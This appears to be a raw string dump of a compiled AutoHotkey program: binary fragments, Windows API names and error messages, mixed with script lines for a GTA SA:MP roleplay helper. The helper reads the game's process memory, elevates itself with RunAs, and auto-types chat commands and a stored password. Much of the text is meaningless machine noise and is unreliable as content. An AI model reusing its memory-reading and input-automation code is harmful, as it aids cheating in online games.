        "VVVVVVVVVVVV[[[[[[[[[[[[[[[",
        "8D$AH",
        "WriteConsoleW",
        "NumpadEnter",
        "\\ at end of pattern",
        "L$@E3",
        "A_A^A]_^",
        "MonthCal",
        "D8d$Ht",
        "&Scaron;",
        "0x%Ix",
        "A^A\\_^[]",
        "t;fff",
        "t$(M;",
        "D$PfD",
        "|$@~H",
        "8uu?H",
        "PA\\_^",
        "CLSIDFromProgID",
        "L$XfA",
        "NumPut",
        "@UVATAUH",
        "|5PBt5A",
        "IcqHI",
        "CaretY",
        "DestroyWindow",
        "K~Je#>!",
        "CurrentLine",
        " !\"#$%%%%%%&&'()*+%%%%%%&&'()*+,,,,,,--./012QQQQQQQQ334556789999:;<;<=>=?@AB=?@ABQQQQQCDEFGHIJKLMN",
        "ytjA+",
        "|$ ATAUAVH",
        "Simple",
        "internal error: unexpected repeat",
        "Margin",
        "Missing \"key:\" in object literal.",
        "Exception",
        "|$0x8f",
        "v$L;s",
        "t1L9=",
        "E;~$}\"A",
        "H;B0}",
        "-------------------------------------------------------------------",
        "D8m#u",
        "Limbu",
        "CreateToolhelp32Snapshot",
        "D8h#u",
        "{uffA",
        "sleep 500",
        "gui, 1:add, text,  cWhite vM4 x0 w250 Center, % ahk[i+1]",
        "%sGlobal Variables (alphabetical)%s",
        "L$2f9",
        "[[[[[[[[[[[[[[[[",
        "MouseClick",
        "IcEPD",
        "tcf90H",
        " {address: 0x%IX}",
        "Missing \"]\"",
        "d$ D8a<",
        "EnvUpdate",
        "A^A\\_[",
        "u8fD9{",
        "GetPropW",
        "SetWinDelay",
        "GetTopWindow",
        "T$\"fD",
        ")t$pff",
        "l$0L9c",
        "T$HH;",
        "|$DD9d$X",
        "sbfD;",
        "NoDefault",
        "GetPrev",
        "e A_A^A]A\\]",
        "NoHide",
        "missing )",
        "0.0.0.0",
        "Default",
        "%u.%u.%u.%u",
        "GetSystemPaletteEntries",
        "Verb: <%s>",
        "GetCount",
        "Owner",
        "ImageList_ReplaceIcon",
        "open \"%s\" alias AHK_PlayMe",
        "__New",
        "Call to nonexistent function.",
        "@UVAVH",
        "8D$1H",
        "H;D$H",
        "@SVAUAWH",
        "October",
        "CallNextHookEx",
        "uUE8|$",
        "C$9C |(",
        "v+L;c",
        "@USVWH",
        "NumpadClear",
        "L$ SUWATAUAVAWH",
        "HKEY_CLASSES_ROOT",
        "Digit",
        "WIN_2003",
        "uSfE9M",
        "LoopFileExt",
        "DestroyIcon",
        ">jtm}S",
        ".?AVFunc@@",
        "State",
        "BC?>6t9^",
        "Paused threads: %d of %d (%d layers)",
        "f93u=",
        ";} s-H",
        "Invalid memory read/write.",
        "Length",
        "Too many tab controls.",
        "Failed attempt to launch program or document:",
        "(*VERB) not recognized",
        "micro",
        "0A_A]A\\",
        "9uu=H",
        "nid:=WeaponId()",
        "MapVirtualKeyExW",
        "ecirc",
        "u\"D8w#H",
        "RedrawWindow",
        "R6033",
        "LcKDH",
        "aring",
        "IsCharAlphaW",
        "SUATAVH",
        "contains",
        "r#fA;",
        "t!H9s",
        "SetScrollLockState",
        "IconFile",
        "FileRecycle",
        "\\P{Lu}",
        "GetStringTypeW",
        "Single",
        "t3ffff",
        ".i?0@I",
        "AUAWH",
        "\\$ Hc",
        "{RCtrl up}",
        "MB_GetString",
        "v!H;s",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "ExcludeClipRect",
        "Unexpected function",
        "|$xD;",
        "LoopFileTimeModified",
        "&Refresh",
        ";:u,H",
        "d$XH+",
        "L$XH3",
        "#MaxThreads",
        "SetWindowsHookExW",
        "Run *RunAs %A_ScriptFullPath%",
        "ControlDelay",
        "GetNext",
        "CD9C@r'H",
        "t0D9=q",
        ")t$`H",
        "SendInput {f6}^a/id  %nick1%_%nick2%{enter}",
        ";D$p~SLc",
        "SendRaw",
        "WheelUp",
        "FindClose",
        "Rejang",
        "FlashWindow",
        "MaxParams",
        "DefaultMouseSpeed",
        "Full class name is too long.",
        "LcKDL",
        "xpxxxx",
        "id:=WeaponId()",
        "f97u*",
        "RtlLookupFunctionEntry",
        "[[[[[[[[[[[[[[[[[[[[[[[[[",
        "\\p{Xan}",
        "H98t!",
        "(E;~ ",
        "TrackPopupMenuEx",
        "Vr.>T",
        "InternetOpenW",
        "D W?{W",
        "H+D$@H",
        "RegRead, gtapath, HKEY_CURRENT_USER, Software\\SAMP, LauncherDLL",
        "RCtrl",
        "Parse",
        ";|$P|",
        "A_A^A]A\\^[]",
        "D$@<t",
        "OnError",
        "x`L9gpttH",
        "Batak",
        "Local variables must not be declared in this function.",
        "WinRestore",
        "fD9#u",
        "TitleMatchMode",
        "FileSystem",
        "80tVD",
        "WheelLeft",
        "GuiControl, 6:, hpbar, ",
        "InitializeCriticalSectionAndSpinCount",
        "true:",
        "Browser_Refresh",
        "BoundFunc",
        "The oldest are listed first.  VK=Virtual Key, SC=Scan Code, Elapsed=Seconds since the previous event.  Types: h=Hook Hotkey, s=Suppressed (blocked), i=Ignored because it was generated by an AHK script, a=Artificial, #=Disabled via #IfWinActive/Exist, U=Unicode character (SendInput).",
        "arem() {",
        "SHGetPathFromIDListW",
        "gui, 2:color, Black",
        "PostQuitMessage",
        "Max window number is 10.",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "default",
        "Tibetan",
        "GdipDisposeImage",
        ",HR>O",
        "s H9k ",
        "L$HL9e",
        "- unexpected multithread lock error",
        "%s  (in function %s)",
        ";D$\\A",
        "%s[%Iu of %Iu]: %-1.60s%s",
        "K SVAUAWH",
        "8A]_^[",
        "return false",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "`eh vector vbase constructor iterator'",
        "UTF16)",
        "LoadCursorW",
        "tmE8h",
        "*StO9>T",
        "not between",
        "Handle",
        "Media_Prev",
        "l$ VATAUAVAWH",
        "findline(text, i:=0) {",
        "RegView",
        "u28D$0D",
        "E0fD9(uAA",
        "Imperial_Aramaic",
        "TLOSS error",
        "CaretX",
        "SendInput {F6}",
        "String too long.",
        "fD9+t?A",
        "fD9't",
        "UUUUUU",
        "global auth:=0",
        "NumpadUp",
        "H;T$prPLcL$xH",
        "9_ v2",
        "5@8{#u",
        "?|u=H",
        "lower",
        "acute",
        "BitNot",
        "Egrave",
        "L$&fD",
        "Delimiter",
        "D9d$ ",
        "DesktopCommon",
        "LoopRegKey",
        "CreateCompatibleBitmap",
        "pA_A^A]A\\_^]",
        "invalid UTF-16 string",
        "t$HD;",
        "$L9_H~WH",
        "@UVWATAUH",
        "GetPrivateProfileSectionW",
        "sendinput {d down}",
        "Escape",
        "ACCEPT",
        "underline",
        "L$PHc",
        "iniread, fam, rp.ini, settings, fam",
        "Ctrl+E",
        "D$SA;",
        "Gui, 5:Destroy",
        "sleep 1050",
        "A+O(H",
        "`vector vbase constructor iterator'",
        "Ol_Chiki",
        "IsIconic",
        "D$PA9",
        "ExitProcess",
        "gui, 5:add, text, x10 y20 w250 cRed  vpstatus, ",
        "l$(E3",
        "SUWATAUH",
        "HcG$H",
        "A_A]A\\",
        "TRYAGAIN",
        "$D8q#u",
        ".?AVComObject@@",
        "EnvAdd",
        "CreateWindowExW",
        "CallWindowProcW",
        "8ut)H",
        "\\$Pf9",
        "global i = 1",
        "StringLeft",
        "|$ ;=f",
        "Rename",
        "IsCharLowerW",
        "A window class is required.",
        "Mffff",
        "hA^A\\",
        "t$`L+",
        "Focus",
        "EL$0H",
        "GetForegroundWindow",
        "Run, Z:\\Games\\gtarp_crmp\\samp.exe 51.83.170.116:7777,, UseErrorLevel",
        "uDI9v",
        "CoordMode Pixel, Screen",
        "UVWATAVH",
        "Visible",
        "RP := RegExReplace(RP, \"\\Q$\\Erank\", rank)",
        "^+!#{}",
        "D8t$@",
        "Timeout",
        "[[[[[[[[[[[[[[[[[[[[",
        "if (inveh()>0) {",
        "T$PHc",
        "WindowSpy.ahk",
        "Gui, 6:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20",
        "|$`fB9tc",
        "DL>fD",
        "PCSpeaker",
        "I9L$Hw",
        "NOPPQ",
        "\\$pE3",
        "`vector vbase copy constructor iterator'",
        "VisibleNonText",
        "atilde",
        "Lc@0J",
        "YD$0H",
        "T$PE3",
        "- not enough space for arguments",
        "ControlGetPos",
        "D$hE;",
        "L$Df;",
        "number after (?C is > 255",
        "colSettings := objWMIService.ExecQuery(\"Select * from Win32_OperatingSystem\")._NewEnum",
        "gui, 6:color, black",
        "brvbar",
        "ahk_parent",
        "Georgian",
        "=>?@A",
        "PeekMessageW",
        "Can't open clipboard for writing.",
        "%s.%s",
        "Space",
        "&mdash;",
        "The maximum number of Folder Dialogs has been reached.",
        ";_ sKH",
        "lid:=id",
        "t-LcJ@H",
        "This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.",
        "MonitorCount",
        "Int64",
        "8ke?;",
        "Len%s",
        "USVWATAUAVAWH",
        "E8H9E",
        "L$08Y#u",
        "!WheelUp::",
        "fD9#tSH",
        "&sbquo;",
        "`local static guard'",
        "WinWait",
        "Braille",
        "R6008",
        "HcL$HH",
        "@A^A\\^",
        ";7sUH",
        "D$HfD",
        "`copy constructor closure'",
        "OpenClipboard",
        "D8d$@u5D8d$Au.H",
        "WinActivateBottom",
        "u%L9s",
        "CloseHandle",
        " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~",
        "l$hE3",
        "DeleteObject",
        "aelig",
        "&rsquo;",
        "AVAWH",
        "Jumps cannot exit a FINALLY block.",
        "SizeAll",
        "sendchat(text)  {",
        "if not GetKeyState(\"%s\")",
        "Extra",
        "CoordModeMenu",
        ";D$0A",
        "GetShortPathNameW",
        "- abort() has been called",
        "SendMode",
        "Tray menu must not be deleted.",
        "H9JHvufffff",
        "Button",
        "uacute",
        ";k0}AH",
        "reference to non-existent subpattern",
        "NOTE: To disable the key history shown below, add the line \"#KeyHistory 0\" anywhere in the script.  The same method can be used to change the size of the history buffer.  For example: #KeyHistory 100  (Default is 40, Max is 500)",
        "YWeek",
        "v'L;f",
        "GetWindowThreadProcessId",
        "Pixel",
        "GetKeyboardLayoutNameW",
        "GroupClose",
        "Too many menu items.",
        "Monitor",
        "ColClick",
        "D$HL+",
        "D$#A8D$\"rJ",
        "ty@85",
        "tED8p#u",
        "L;-{3",
        "[[[[[[[[[[[[",
        "j?V()",
        "WinExist",
        "mixerGetLineControlsW",
        "T$4A;~ ",
        "HcM H",
        "OpenProcess",
        "Numpad4",
        "u@D9-",
        "@VWAUH",
        "@8x7u",
        "7HcO$H",
        "Press OK to continue.",
        "D$hA;w ",
        "LL0t#H",
        "@8{#t",
        "JoyPOV",
        "PostMessage",
        "`h`hhh",
        "SetMenuItemInfoW",
        "{Raw}",
        "!WheelDown::",
        "mixerGetLineInfoW",
        ":>t6k'",
        "&File",
        "HcB,A",
        "SendInput",
        "Enable",
        "Analog",
        "&bull;",
        "apt:=!apt",
        "PA_A]A\\_^][",
        "CL:>8",
        ".?AUIDispatch@@",
        "gui, 1:font, s16",
        "prread(hProccess, dwAdress, type := \"Int\", numBytes := 4) {",
        "__clrcall",
        "NumpadSub",
        "Syntax error or too many variables in \"For\" statement.",
        "f90t;H",
        "Lydian",
        "IntersectRect",
        "__Delete",
        "C f9E",
        ": %sar1%",
        "Gui, launcher:Add, Button, x22 y319 w270 h50 gbtnstart, ",
        "SetFormat",
        "A^A]A\\_^][",
        "fD93t(H",
        "Literal commas and percent signs must be escaped (e.g. `%)",
        "Unknown exception",
        "Too many parameters passed to function.",
        "rp := RegExReplace(rp, \"\\Q$\\Esec\", time.s)",
        "RAMDisk",
        "- floating point support not loaded",
        "ocirc",
        "time:=gettime()",
        "D95G1",
        "Continue",
        "#32768",
        "GetClipboardData",
        " Base Class Array'",
        "t$ WH",
        "rIH+D$`LcL$xE",
        "WinWaitNotActive",
        "`managed vector destructor iterator'",
        "@SUVWH",
        "T$@Hc",
        "Egyptian_Hieroglyphs",
        "L$ USVWH",
        "v(H;s",
        "~sfA;",
        ">AUTOHOTKEY SCRIPT<",
        "ErrorLevel",
        "LocalFileTimeToFileTime",
        "_cabs",
        "egrave",
        "GetWindowTextW",
        ")t$P<",
        "BitBlt",
        "Memory limit reached (see #MaxMem in the help file).",
        "(D;g ",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "password(){",
        "L$0H;",
        "keybd_event",
        "Bengali",
        "Latin",
        "AK>(v",
        "T$@f;",
        "IfInString",
        "HasKey",
        "USVWATAUAVH",
        "A_A^A]A\\_^[]",
        "H9|$0t",
        "`A^_]",
        "A_A]_^[]",
        "f92t H",
        "IsLabel",
        "9kTtB",
        "BitShiftRight",
        "SetKeyDelay -1, -1",
        "Aacute",
        "UVWATAUAWH",
        "mixerOpen",
        "HcL$X",
        "vLHcB,H",
        "u,D8m",
        ".?AVbad_alloc@std@@",
        "iniread, y, rp.ini, settings, y",
        "Runic",
        "CheckMenuItem",
        "@UATAUAWH",
        "return input",
        "CONOUT$",
        "9|$pt",
        "D8Q#I",
        "(;N r",
        "0A_A^A]A\\_^[",
        "9Y vM",
        "invalid escape sequence in character class",
        "IfWin",
        "Oslash",
        "D$0H9C",
        "ar:=GetArmour()",
        "A^_^[",
        "fA9\\$",
        "Submenu must not contain its parent menu.",
        "@SATAUAVAWH",
        "L;-V5",
        "A^A]_][",
        "!This program cannot be run in DOS mode.",
        "<otA<pt=A",
        "|$huAf",
        "LcA<E3",
        "LoopRegSubKey",
        "TimeIdle",
        "]3+]+C",
        "LocalSameAsGlobal",
        "Exact",
        "tLD85",
        "R6028",
        "Can't load icon.",
        "Missing close-quote",
        "A_A]A\\_[]",
        "LoopFileShortName",
        "SetPropW",
        "LineNumber",
        " Class Hierarchy Descriptor'",
        "Object",
        "frac14",
        ";*uuH",
        "ulHcGT",
        "AutoSize",
        "@A_A\\_^]",
        " A_A]A\\",
        "WriteFile",
        "%u hotkeys have been received in the last %ums.",
        "%sBottom",
        "InputBox",
        "fD9;u",
        "GroupAdd",
        "/restart",
        "T$pI;",
        "D$(E3",
        "MIDDLE",
        "t$0t#H",
        "LCtrl ",
        "ProgramFiles",
        "The AltTab hotkey \"%s\" must specify which key (L or R).",
        "u(@8-",
        "fE9,$t`A",
        "v!M;e",
        "T$PI+",
        "@8t$`t",
        "!<40C'S\"",
        "Invalid",
        "[[[[[[[[[[",
        "t$ UWATAVAWH",
        "Translation",
        "REG_SZ",
        "c(>\\,",
        "Agrave",
        "9D$@t",
        ":?:/acuff::",
        "&#%d;",
        "Standard",
        "KeyDown",
        "ComSpec",
        "%s.%.*s := %.*s, ",
        "Region",
        "Too many controls.",
        "Cannot jump from inside a function to outside.",
        "D8o#u",
        "SVATAUAVH",
        "BitXOr",
        "Launch_Mail",
        "This hotstring is missing its abbreviation.",
        "Canadian_Aboriginal",
        "l$@Lc",
        "EL$8H",
        "Theme",
        "`A\\_]",
        "Alpha",
        "U(A9V ",
        "t+fE9",
        "u D8%*",
        "Ambiguous or invalid use of \".\"",
        "SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\",
        "\\$ UVWATAWH",
        "D$PHcE",
        "&Suspend Hotkeys",
        "@SUATH",
        "I9L$Hve",
        "UnhookWindowsHookEx",
        "fD9|$0",
        "j>>A?1",
        "HcT$0A",
        "l$8D8s#u",
        ".?AVexception@std@@",
        "(t$ H",
        "Otilde",
        "t1L95",
        "Removable",
        "D$^L;",
        "9D$ u@",
        "fD9'u",
        "SetTimer, hud, 100",
        "u-@8=@X",
        "@\"=`+",
        "A_A^A]A\\_^]",
        "D$`E3",
        "POSIX collating elements are not supported",
        "GetVolumeInformationW",
        "WHILE",
        "v%H;O",
        "D$0Mc",
        "FlsGetValue",
        "u2f9C",
        "ImageList_Destroy",
        "D$BE2",
        "joypoll",
        "Ocirc",
        "t\\D8s(tAD85@",
        "|$@uF",
        ".?AVComArrayEnum@@",
        "D8c=upD8c>tjf",
        "SetTitleMatchMode",
        "CountClipboardFormats",
        "SoundGet",
        "v!L;k",
        "u0fE9|$",
        "A fA9",
        "t&L+UX",
        "Pos%s",
        "@A\\_^][",
        "fD9<pt\\D8\\$Tu",
        "NumpadPgUp",
        "u0D8m#u",
        "xA_A^A\\_][",
        "@UATAVH",
        "L$$A+",
        "D8L$zH",
        "p WATAUH",
        "GetWindowLongW",
        "D$HD8s#u",
        "GetWindowTextLengthW",
        "gui, 2:add, text, x0 y0 w150 cGreen  vStatusAC +Center , AutoCuff",
        "IfLess",
        " new[]",
        "FileEncoding",
        "D$XE3",
        "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\\\\\\\\\\",
        "Invalid method name.",
        "%sGui",
        "u-D8=",
        "`placement delete[] closure'",
        "t$XL9c",
        "H!\\$ H",
        "GetActiveWindow",
        "0x%06X",
        "L$THc",
        "t*HcO",
        "GroupBox",
        "v}`[>",
        "D$0E3",
        "@8|$HtT",
        "9\\$ ~>H",
        "SoundSetWaveVolume",
        "WSOCK32.dll",
        "GetOpenFileNameW",
        "SetClipboardViewer",
        "H9A u/H",
        "IniWrite",
        "Select File - %s",
        " 'L>[",
        "L$Xu@E3",
        "v!H;{",
        "T$iLc",
        "SeShutdownPrivilege",
        "SystemParametersInfoW",
        "[SSSSSSSSSSSSS[[[",
        "waveOutSetVolume",
        " (.*)\\Q[\\E(.*)\\Q]\\E\") == -1",
        "CreateDCW",
        "sendchat(\"/cuff \" id2)",
        "@SUVWATAUAVH",
        "Equalizer",
        "u%8D$0D",
        "number too big in {} quantifier",
        "t$ AT",
        "A+C0H",
        "GetDlgCtrlID",
        "0X8b?~",
        "A>pP&",
        "SetEnv",
        "CreateDIBSection",
        "xQfff",
        "Parameter #2 must not be blank in this case.",
        "IsCompiled",
        "CreateWindow",
        "Menu item name too long.",
        "fD9)t",
        "!numpad0::reload",
        "- not enough space for environment",
        "A#E;M",
        "r$I+I(A",
        "FindResourceW",
        "E6D8u>t3;",
        " A_A^A\\_[",
        "t$XH9A",
        "Browser_Back",
        "Process32NextW",
        "D$ L;",
        "SetWindowTheme",
        "StartMenuCommon",
        "d$ fE9",
        "[[[[[[[[",
        "Transparent",
        "T$0H#",
        "DropFiles",
        "%s up::",
        "ccedil",
        "D8s#tY",
        "fE9)u",
        "4IcD$",
        "Empty variable reference (%%).",
        "December",
        "closing ) for (?C expected",
        "RaiseException",
        "H+U(H",
        "#MaxThreadsPerHotkey 250",
        "sendchat(\"/me ",
        "A;E |",
        "IsZoomed",
        "(t$PH",
        "8C4uDH",
        "WinGetPos",
        "@text",
        "ScreenHeight",
        "&amp;",
        "D8p#t",
        "l$ VATAVH",
        "f9l$ tWH",
        "GetKeyState",
        "status cdaudio mode",
        "&ldquo;",
        "RP := A_LoopField",
        "X_^[]",
        "Number",
        "IniDelete",
        "D$,D+\\$ +D$$D",
        "GetModuleFileNameW",
        "|# Lc",
        "Thread",
        "t$0E3",
        "gui, 1:color, Black",
        "Selected",
        "A^A]]",
        "Lepcha",
        "@A^A\\_",
        "Process Exist, gta_sa.exe",
        "SysGet",
        "&Help",
        "v(H;~",
        "v'L;n",
        "OpenProcessToken",
        "EnvSub",
        "gui, 5:add, text, x10 y40 w250 cWhite  vpname, ",
        "tUH;N",
        "ControlClick",
        "VisibleText",
        "return prread(getprocessid(), 0xBAA410)",
        "`vector constructor iterator'",
        "T$HE3",
        "0A\\][",
        "&Dagger;",
        "AhkVersion",
        "H;D$xu",
        "l$8t$",
        "- CRT not initialized",
        "VirtualFreeEx",
        "Khmer",
        "LcGTH",
        "SetErrorMode",
        "3>N;kU",
        ":?:/apt::",
        "JoyButtons",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "E&xit",
        "<$:ubA",
        "Suspend, on",
        "HideDropDown",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "yac:=A_ScreenHeight - 40",
        "Master",
        "\\AutoHotkey.exe",
        "Force",
        "DllCall",
        "GetSystemMenu",
        "&scaron;",
        "HcT$4A",
        "~ID;c",
        "RegisterClassExW",
        "CaseSensitive",
        "MaxSize",
        "LegalCopyright",
        "unrecognized character after (?<",
        "If WinActive(\"GTA:SA:MP\") {",
        "0A\\_]",
        "t$\\;t$X",
        "D$ Hc",
        "WinMove",
        "Nonexistent hotkey.",
        "COMMIT",
        "D;T$X}nH",
        "R6024",
        "Can't create font.",
        "inconsistent NEWLINE options",
        ".>PJ;I:qE>",
        " A_A^A]A\\^",
        "shlwapi",
        "SetFilePointer",
        "H9k@tNH",
        "mgun:",
        "GetPrivateProfileSectionNamesW",
        "u*H9\\$ht#H",
        "while i < 5",
        "CreateCompatibleDC",
        "atan2",
        "menu()",
        "NoStandard",
        "t<<kt8H",
        "GetProcessId",
        "|$ ATH",
        "9s0~.H",
        "CoordModeMouse",
        "u<L9f",
        "E;N A",
        "A+C0fA",
        "HcD$HH",
        "L$HD8e_",
        "`vcall'",
        "LoadLibraryExW",
        "D;R(}ELcJ,H",
        "open:=0",
        "&OElig;",
        "Ugrave",
        "GetSystemWindowsDirectoryW",
        "RegSetValueExW",
        "u}@85",
        "8\\$8t",
        "Old_Turkic",
        "Loop, parse, rps, `n",
        "RP := RegExReplace(RP, \"\\Q$\\Ename\", name)",
        ":\" nick1 \", ",
        "WinGetTitle",
        ":L$Sr",
        "ControlGetText",
        "NoIcon",
        "|$ UH",
        "+f;F u%L9n",
        "D$@t6L",
        "DoubleClick",
        "ListHotkeys",
        "UVWATAUAVAW",
        "This dynamically built variable name is too long.  If this variable was not intended to be dynamic, remove the % symbols from it.",
        "IDLast",
        "SetPriorityClass",
        "GuiControl, 1:, M2, % ahk[i-1]",
        "D+\\$pD+D$tL",
        "parentheses nested too deeply",
        "D8E-t",
        "if not nid=id",
        "&Reload Script",
        "AlwaysOn",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "Supported only for the tray menu",
        "NoActivate",
        "Eject",
        "d$,A;",
        "UVATAUAVH",
        "DispatchMessageW",
        "iexcl",
        "Inscriptional_Pahlavi",
        "R6009",
        "operand of unlimited repeat could match the empty string",
        "USER32.dll",
        ">0u&A",
        "January",
        "CreatePatternBrush",
        "v'H;n",
        "+t$X+\\$\\H",
        "Numpad6",
        "All Files (*.*)",
        "D8{#u",
        "character value in \\x{...} sequence is too large",
        "LoopFilePath",
        "u$E8|$",
        "v(H;w",
        "EmptyClipboard",
        "Switch",
        "___[`[aabccccccccccccccccc[cccccccccdeeebfffffffffffffffffgfffffffffhiijklmmmnopXYXYXYXYXYqrqrqrqrqrqrqrstubvwxXYyXYbzzz{{{{{{{{{{{{{{{{||||||||||||||||||||||||||||||||}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}~~~~~~~~~~~~~~~~",
        "Missing \"]\" before \":\"",
        "&quot;",
        "gui, 6:add, text, cRed vhpbar,  ",
        "/fD9m",
        "D$HD8",
        "D8a#u",
        "FlsSetValue",
        " Complete Object Locator'",
        "if A_LoopField",
        "xotmH",
        "SAUAVAWH",
        "Browser_Home",
        "}  else    {",
        "BindMethod",
        " (.*)\\Q[\\E(.*)\\Q]\\E\")), \"",
        "button",
        "l$ VWAUH",
        "#NoEnv",
        "AHK Mouse",
        "9ut$H",
        "~&I;t$0}",
        "Samaritan",
        "Execute() {",
        "properties",
        "(t$0H",
        "WritePrivateProfileSectionW",
        "u9fE9|$",
        "gui, 4:hide",
        "C;_X|",
        " {wrapper: 0x%IX, vt: 0x%04hX, value: 0x%I64X}",
        " A^A]A\\",
        "MaximizeBox",
        ":L$Qw",
        "global ahk := Array()",
        "SendInput %pass%{enter}",
        " id:%A_Space%",
        "Index",
        "TransColor",
        "A^A]A\\_[]",
        "Microphone",
        "f9>u!",
        "fD9|$0t",
        "StrLen",
        "GetDiskFreeSpaceExW",
        "L$ I;",
        "fffff",
        "SetLayeredWindowAttributes",
        "t$@fA",
        "RButton",
        "Len%d",
        "*9{@v%f",
        "(t$PL",
        "t ffff",
        "@A\\^[",
        "9N v!H",
        "f9l$ tXH",
        "fE9&u",
        "KeyOpt",
        "Access violation - no RTTI data!",
        "T$@fA9",
        "LoadImageW",
        "ListVars",
        "LWin ",
        "TTTTTTTTTTTT",
        "pA^A]A\\_^][",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "SendInput /r [%tag%] ",
        "WIN_8",
        "fD9.u\"",
        "\\$`Hc",
        "WritePrivateProfileStringW",
        "Fixed",
        ">ERCPH",
        ".?AVbad_typeid@std@@",
        "FileGetShortcut",
        "no error",
        "YDay0",
        "PtrSize",
        "IsCritical",
        "WinDir",
        "IsAdmin",
        "Checkbox",
        "C;t$P",
        "&permil;",
        "space",
        "t$xE2",
        "T$pH3",
        "uCf9C",
        "&rsaquo;",
        "#NoTrayIcon",
        "Max hotkeys.",
        "A)ETA",
        "~T;G ~",
        "fD9\"u",
        "t$`fA#",
        "TitleMatchModeSpeed",
        "__Delete will now return.",
        "G 9G$u",
        ".?AV?$CKuStringT@DVCKuStringUtilA@@@@",
        "SetUnhandledExceptionFilter",
        "l$6t@E",
        "SSSSSSSSSTTTTTTTTT",
        "#InstallMouseHook",
        "&Lines most recently executed",
        "GetCurrentProcess",
        "- unexpected heap error",
        "SoundBeep",
        "The maximum number of File Dialogs has been reached.",
        "|L<\\t",
        " data",
        "support for \\P, \\p, and \\X has not been compiled",
        "Return",
        "Ready",
        "@tBE3",
        "function",
        "L$XtRH",
        "fD9?u4",
        "t$@E3",
        "fD9&tkfD9#H",
        "rp := RegExReplace(rp, \"\\Q$\\Emin\", time.m)",
        "ControlSend",
        "D$BHc",
        "Not a valid method, class or property definition.",
        "l$@fD",
        ".?AVbad_exception@std@@",
        "ScreenToClient",
        "SetBkMode",
        "OwnerLink",
        "NumpadLeft",
        "if autogun",
        "RegDelete",
        "RIGHT",
        "Can't delete items (in use?).",
        "\\k is not followed by a braced, angle-bracketed, or quoted name",
        "OleInitialize",
        "L$ UVWATAUH",
        "_fD9#u",
        "` AVH",
        "UnregisterHotKey",
        "The program is now unstable and will exit.",
        "8Z!tX",
        "MM/dd/yy",
        "Warning",
        "0A^A]A\\",
        "`default constructor closure'",
        "octal value is greater than \\377 in 8-bit non-UTF-8 mode",
        "v%L;o",
        "Numlock",
        "t$ WATAUH",
        "SplashImage",
        "DetectHiddenText",
        "A_A^A]A\\_^][",
        "@8x#u",
        "D$HH+",
        "Numpad8",
        "global hpwarning:=0, arwarning:=0",
        "L$$E2",
        "D$8+D$0D+\\$4D",
        "ControlSendRaw",
        "ThisLabel",
        "StatusBarGetText",
        "<>#n2",
        "__Get",
        "Programs",
        ";X<}`M",
        "PrintScreen",
        "remed:=0",
        "\\$ VH",
        "uMfE9M",
        "RtlCaptureContext",
        "R6002",
        "Shell_TrayWnd",
        "__Init()",
        "strike",
        "SVWATAUH",
        "Phoenician",
        "&Window Spy",
        "InvalidateRect",
        "- unable to open console device",
        "CDROM",
        "missing terminating ] for character class",
        "if RegExmatch(getchatline(i), text)",
        "LoopFileSizeMB",
        "@SWATAVH",
        "v%H;_",
        "LockResource",
        "fD9;t",
        "D$`H9E",
        "\\p{L}",
        "|$ E3",
        "l$ VH",
        "this version of PCRE is compiled without UTF support",
        "H!|$ L",
        "subpattern name is too long (maximum 32 characters)",
        "SetLabel:",
        "d$8L9k",
        "False",
        "Segoe UI",
        "H9y0u",
        "CoCreateInstance",
        "D$pH;",
        "DwmGetWindowAttribute",
        "Expected Case/Default",
        "Meetei_Mayek",
        "t8L9@",
        "Short",
        "%i-%i",
        "\\$8L3",
        "Disabled",
        "A]A\\_^[]",
        "Lucida Console",
        "HelpContext:",
        "StringFileInfo",
        "|$ 9;",
        "Thursday",
        "GetAddress",
        "\\$0D8k#u",
        "USER32.DLL",
        "GetMenu",
        "CurrentCol",
        "8A_A^A]A\\_^][",
        "FileVersion",
        "v(M;E",
        "L$Xf9",
        "H;|$@rKH",
        "EnableMenuItem",
        "Section",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "New_Tai_Lue",
        "ERCPu",
        "alpha",
        "Can't create control.",
        "GlobalFree",
        "@SUATAWH",
        "Gui, 4:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20",
        "ComObjArray.Enumerator",
        "@WATAUAVAWH",
        "Silver",
        "VWAUH",
        "JoyAxes",
        "AutoHotkey.chm",
        "BSR_ANYCRLF)",
        "@WATAWH",
        "H9.stI",
        "Can't Open Specified Mixer",
        "L$HH3",
        "The script could not be reloaded.",
        "t$0tF",
        "8*uFH",
        "D8|$At`",
        "SetMouseDelay",
        "C\" uS",
        "Cherokee",
        "\\$ WH",
        "Missing \"}\"",
        "No valid COM object!",
        "LcL$XD",
        " Base Class Descriptor at (",
        "tBD9-6",
        "Missing class name.",
        "StringGetPos",
        "v%I;_",
        "uZE8h",
        "Query",
        "T$@E3",
        "Break/Continue must be enclosed by a Loop.",
        "G98G8r0",
        "Oriya",
        "Ecirc",
        "D8g#u",
        "D8e_t",
        "FileRemoveDir",
